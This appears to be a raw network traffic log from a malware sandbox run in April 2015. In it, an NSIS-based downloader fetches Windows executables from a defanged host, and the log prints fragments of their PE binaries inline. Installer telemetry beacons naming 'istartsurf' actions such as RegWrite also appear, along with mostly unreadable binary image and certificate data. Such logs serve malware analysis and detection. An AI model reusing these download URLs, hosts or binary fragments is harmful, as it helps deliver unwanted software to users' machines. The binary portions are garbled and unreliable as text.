.}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /310714d/291014_nj.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:47 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1985320
Content-Description: File Transfer
Content-Disposition: attachment; filename="291014_nj.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s..........h............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...h............v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /310714d/310714_gs.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:47 GMT
Content-Type: application/octet-stream
Content-Length: 1112422
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s..........H............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...H............v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
18............s.......X.......0..
GET /img/Global/Yes_Button.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1091
Connection: keep-alive
x-amz-id-2: FufJylo2h0LlgAvBhv6FKeS8RiEbjEd6iaXEFUTvT/OyG ZgeEaS5ooHNe8/F0Le
x-amz-request-id: 69875246E7628FFF
x-amz-meta-s3fox-filesize: 1091
x-amz-meta-s3fox-modifiedtime: 1380713503006
Last-Modified: Wed, 13 Nov 2013 16:12:48 GMT
x-amz-version-id: .ffwqW.8iCK2_zdeBNvgWdy.OnUDjeHF
ETag: "3f27a393967d84f83a317f40351c0065"
Accept-Ranges: bytes
.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D2B0E0924EA11E392EFCCF1BDECC388" xmpMM:DocumentID="xmp.did:2D2B0E0A24EA11E392EFCCF1BDECC388"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2D2B0E0724EA11E392EFCCF1BDECC388" stRef:documentID="xmp.did:2D2B0E0824EA11E392EFCCF1BDECC388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..&X....IDATx...1..0.E.......... .d.6\.&.NDH.v....9.{....)...D$k...O...T.[Sl.I....K.....S3..fB...2?w.....2...../=#.3.E(B...E(B...E( ...E(..Z..f..)U..l9.....7...........I..w...).u*..P#G...?...%....\.l....IEND.B`.....
<<< skipped >>>
GET /img/Global/Yes_Button_Hover.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1094
Connection: keep-alive
x-amz-id-2: ZH/H/BrlB90f12Jgses7dcqPxryj5NnMS0cI2SxwLBB85Qfj2OXlGAsGTEDmcFC7
x-amz-request-id: 91A6ABE35D0A7569
x-amz-meta-s3fox-filesize: 1094
x-amz-meta-s3fox-modifiedtime: 1380713503000
Last-Modified: Wed, 13 Nov 2013 16:12:44 GMT
x-amz-version-id: L9RQqPthtuNtMC55hxM9o_RZqWXqZtid
ETag: "aec475b9d6280598800f3ceafea4af8c"
Accept-Ranges: bytes
.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:30B2AE2724EA11E392EFCCF1BDECC388" xmpMM:DocumentID="xmp.did:30B2AE2824EA11E392EFCCF1BDECC388"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:30B2AE2524EA11E392EFCCF1BDECC388" stRef:documentID="xmp.did:30B2AE2624EA11E392EFCCF1BDECC388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>. ,.....IDATx......0.E..D....@L.^L...!...2...........=.....vq?.H.l4[.v..d.S.l......x..W{=..k...L(..3.....k.s..3...K....B..P..B..P@(B...E(B..u.f4.3..)e..l9z.i.?o..7.7M.....%...y..$.:.tA..K........S..^/......IEND.B`.....
<<< skipped >>>
GET /img/Global/No_Button_Hover.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1091
Connection: keep-alive
x-amz-id-2: w8MZLmVYoBIXBjhf7AX2 gI11HEATjoL7xzl5WiqPif2jl7PuO2tfCE3vWAz3tzG
x-amz-request-id: E9FC3602133605A0
x-amz-meta-s3fox-filesize: 1091
x-amz-meta-s3fox-modifiedtime: 1380713503004
Last-Modified: Wed, 13 Nov 2013 16:12:47 GMT
x-amz-version-id: wNmfJwpUmazhRatL.BZxBG0x.XZldhEV
ETag: "6d55a62314755c1454569b2b098a3a9f"
Accept-Ranges: bytes
.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:30B2AE2324EA11E392EFCCF1BDECC388" xmpMM:DocumentID="xmp.did:30B2AE2424EA11E392EFCCF1BDECC388"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:30B2AE2124EA11E392EFCCF1BDECC388" stRef:documentID="xmp.did:30B2AE2224EA11E392EFCCF1BDECC388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx...1..0.E........8A9?=..h'.NDH.v..b $.{....)...D$j...O;.v...I6....../.s.....f....2.>.......1..?........ ...E( ....."...P."..PWhFC1...R.N...g......~.9h..~*.\.Q..3l'.....B.\.W...`.............IEND.B`.....
<<< skipped >>>
GET /img/Rerarapepe/logo.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 10944
Connection: keep-alive
x-amz-id-2: fttMRbWgO3QO0vLVbufMGrfOzBMWbPdneAkQOk8G/aPTYMrgBtiQS33MCTm hCu0
x-amz-request-id: 1D23872D552BD286
x-amz-meta-s3fox-filesize: 10944
x-amz-meta-s3fox-modifiedtime: 1384099835051
Last-Modified: Tue, 12 Nov 2013 11:05:48 GMT
x-amz-version-id: bDPFTNRsfueKXbAbmeVgRbPvzBoRvTw2
ETag: "0440e25b659207aaea00512d9a0a9924"
Accept-Ranges: bytes
.PNG........IHDR...L...^...........*.IDATx....T.....M...F."b.....F.Q....{.%..{E.........{.H....J.~*.....gN..j....._.Z..g..ff.....9C."..t:]'.F3-55uOjZz.......o....\...'....&J4[O*.=i.`%Y...................E.".....Z.>.69%;6.....HNIEFf&.J.,..r~..}.p).....e..V...3./)....A\|.............. k,Q...M..B..h....../..N........#..!V.P.y'X4J...v...Z...o.{ ''....L9....M.....7...l....Ml..SS..........$..C!.3.\...........A.'.......m_..%x...."@....)V%.?|WX...Y\.C.c.r.V..R....g...:.\2....4..M.R9X..b...b......,.U..t.b...Z...P..Q*......7.......t.B.{....@jY!.....Q......Tdk...3;...s..0... ....@.&..m.ktE.f. I.M..1...`..V..d[.9..qG.&".U..C..u...W.C{..4'..v?.....\..>......h<.C{.(4...u...G..E=Gvj..7[.?.:.?.K.9...e..s........,--=....[W'...v......R....^<...!..]........>..j........].v.....j.v..l.j.V.wn.j.&(I.][.r...Q.x..>....Hay...99f..;.%..R..Q_...h4Sy...a]....J.dQ..o........... 9...8.2Br..)...a)w..]...h.f.K.}#i.T[.......u..(.;.....d=....,..{....Z..._.Q..t:... ..H.R..Wt.f^...'6.Xu.\.DU*...u.oAK....&KQ.# .%.Q..f......{34.-.>.M............6'(.8@.y..Z.......$.UP:...i.../..5....V:..\...@.m'@B.:..f.\..,......17.......&.Qn..t..DJ.~w..z.j..........e.Q......&..tX...s.5s*..OA...HY......c...d@. .\.B..n9i..k.@.j.m[)...!h..P..r..,A...A..b......O.Oyr.i..".*....m.EA8...r....T.6H.DP.....n.y=4.LG..1m2N.n.G.rX..........?.....5%mp.A=...H@.C.a5.k.J.V/....J.r!..W.t..r.#Y..J.g.c...{.H,N...>r..lY.'.4.....m.....D.t..YT.d. hN..P.K`.....%\..a-..~....l..s....?...5....8..P... ......5.............3u"...#s..(....7@R,.....Es.9..(...m#k.8...tiP..
<<< skipped >>>
GET /img/Rerarapepe/Rerarapepe3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/jpeg
Content-Length: 15799
Connection: keep-alive
x-amz-id-2: v/KJyRQPRqGzp68fMREpMsXVlN8ZGENjPJZ3xLLc6RX9mf6LfR53urxF4AogH8OE
x-amz-request-id: 10317CBB850CD0F8
x-amz-meta-s3fox-filesize: 15799
x-amz-meta-s3fox-modifiedtime: 1394538949746
Last-Modified: Tue, 11 Mar 2014 11:56:45 GMT
x-amz-version-id: zPl9IpmeaG3ff3qZpgvUQzMtoydG8QKH
ETag: "3e2809731062d36b6ae81e70aef3b785"
Accept-Ranges: bytes
......Exif..II*.................Ducky.......<.....ohXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:F7DDEC055CA8E311B43CF856625B69D6" xmpMM:DocumentID="xmp.did:08AEC486A91411E3A978EB316F7617DC" xmpMM:InstanceID="xmp.iid:08AEC485A91411E3A978EB316F7617DC" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B1126B7673A8E311B43CF856625B69D6" stRef:documentID="xmp.did:F7DDEC055CA8E311B43CF856625B69D6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................................................................................................................0........................................................................................!..1A..Qaq"..2R.......r.#S.T.B.$4..3s...bCdt%U....c......................!1..AQ...aq..."2R......b3..B.r................?..J. ..U.@@@@@@@A...."... .a..... ..U.@@@A.A.]A....Dq.....p:QS...C.u.....|OZ...D<GZ...@..h.#.....E_....:......:.<GZ...A..Z*...C.u.x.......:.e..27...EwQ..z........
<<< skipped >>>
GET /img/Rerarapepe/Rerarapepe_b.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 5163
Connection: keep-alive
x-amz-id-2: AjQL4y8fLzMBXjBcq1riQXu6lrQMz5eIxeZcrvBO8swbGl1434gYRzLcefkTkD6R
x-amz-request-id: D515F0C8C6C1D704
x-amz-meta-s3fox-filesize: 5163
x-amz-meta-s3fox-modifiedtime: 1402217717749
Last-Modified: Mon, 09 Jun 2014 14:41:12 GMT
x-amz-version-id: KNAPX8e2AxH1Bx9jEBmu7jKCGa_97Tvk
ETag: "297eebd38313ee5b5ce0639f28ef2690"
Accept-Ranges: bytes
..2u..wJ0..0..1p..OO...j....u.`{..'.,.4...........m......&......0...p..O|f.s.....W<....v.5..]....{v....S....>..m..n}.cW7....^....].a.y....K.wR#q.........i\.C.>........%.e1>1..C..~...`.#.|....{w..t...%l"?..."......#...ft..Wt.;3|.-.J&..Mj.T]..[...S....x.5O.f.S.o.. I^.....Y.)......l.....6K.q.Jy~{R...t..z....d,........N.Nj...... Y... ....D...K...C......7p...V?.j..^..kH.i..G7.3...u..(.#..i..`....2 V....D...w..?.Wt .k.b.n.H.1..l4...p..U.T~.....T.@v.... ....iJ.f\C..O........-........<V...W.K.....\...7Qu.ny.5.N..ZE...|..f"...e.... R. .ha....e...5.O.O#LiV..F..q..ws...!.o...x.Gj.....LP..l..C'z.|.....t...(....!.RE.t..1yx{.$_..../i....E...I.a.......DL.>s.........R 0.E..R.1.Q...D..m=@...N8...R..|.v-?N...c9,..V-S6o2~..`.5.tk...f...v..<.0(..1.T...n..7...y.i.r... .._.P..c......IEND.B`...2u..wJ0..0..1p..OO...j....u.`{..'.,.4...........m......&......0...p..O|f.s.....W<....v.5..]....{v....S....>..m..n}.cW7....^....].a.y....K.wR#q.........i\.C.>........%.e1>1..C..~...`.#.|....{w..t...%l"?..."......#...ft..Wt.;3|.-.J&..Mj.T]..[...S....x.5O.f.S.o.. I^.....Y.)......l.....6K.q.Jy~{R...t..z....d,........N.Nj...... Y... ....D...K...C......7p...V?.j..^..kH.i..G7.3...u..(.#..i..`....2 V....D...w..?.Wt .k.b.n.H.1..l4...p..U.T~.....T.@v.... ....iJ.f\C..O........-........<V...W.K.....\...7Qu.ny.5.N..ZE...|..f"...e.... R. .ha....e...5.O.O#LiV..F..q..ws...!.o...x.Gj.....LP..l..C'z.|.....t...(....!.RE.t..1yx{.$_..../i....E...I.a.......DL.>s.........R 0.E..R.1.Q...D..m=@...N8...R..|.v-?N...c9,..V-S6o2~..`.5
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?e38c9f6a9f564146 HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Feb 2015 00:37:01 GMT
If-None-Match: "80b4d90ca4fd01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:37:01 GMT
ETag: "80b4d90ca4fd01:0"
Cache-Control: max-age=604800
Date: Thu, 30 Apr 2015 23:11:47 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Last-Modified: Tue, 24 Feb 2015 00:37:01 GMT..ETag: "80b4d90ca4fd01:0"..Cache-Control: max-age=604800..Date: Thu, 30 Apr 2015 23:11:47 GMT..Connection: keep-alive..
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ClearnC HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:33 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0......
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.wpm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:34 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.74 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:34 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.74 ms","message":"store 1 action and 0 update "}..0......
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ient HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:38 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.42 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:38 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.42 ms","message":"store 1 action and 0 update "}..0..
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.RegWrite HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.66 ms","message":"store 1 action and 0 update "}..0..
GET //MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwQSlx3KmUs= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:53 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=122104, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:54:04 GMT
Expires: Sat, 02 May 2015 10:54:04 GMT
ETag: "f8b69e2088ce500f8a2cd23376edbe2b1529a5ce"
Content-Length: 1810
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0....z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430225404Z0..0~0@0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,..........K....20150301022209Z.......20150430225404Z....20150502105404Z0...*.H.............B......&.e..<.>/x......Gj.w..-.w.~#...8[..p.........U.........r....8.-....M....U8.EE....x&..^.6...c..W.I:.b......t..L...!>.K......=q.@..... ...m.F.Er..pK.........fB.Y..-..H.....'T%..*.D...Ij..k..................p.i...Q.|!545........"....~.. .'...T....../s!....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repo
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?daa3db62222adfef HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Content-Length: 969
Date: Thu, 30 Apr 2015 23:11:51 GMT
Connection: keep-alive
0...0...........0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...090901000000Z..371231235959Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority - G20.."0...*.H.............0.........qb...Y4.......IX.".... C.;....I.'....N...p..2...>.N...O/Y0"...Vk......u.9Q{..5.tN......?........j..............;F|2...f"..im6.......`.8......F...>.]|.|.. S..biQ%.a.D..,.C.#..:...)....]....0.9.....K].2..bC%4.V'...;p*?n.....}....Sm`..,.X.._F.....<..I1\iF..G......B0@0...U.......0....0...U...........0...U......:....g(.....An .....0...*.H...............]y...Yg.a.~;.1u-. .Oe......../..Z..t.s.8B..{..u...........S.~.F..... ....'....Z.7....l....=.$Oy.5._.......-.......s@.r%......h..W...:...D...7...2..8..d.,~........h..".8-z..T.i._3.z={...._9..u..v.3.,./L.....O...JT...}......~...^....C..M..k...e.z...D.\....HTTP/1.1 200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT..Accept-Ranges: bytes..ETag: "05934e1494dd01:0"..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.NET..X-Powered-By: ARR/2.5..X-Powered-By: ASP.NET..Content-Length: 969..Date: Thu, 30 Apr 2015 23:11:51 GMT..Connection: 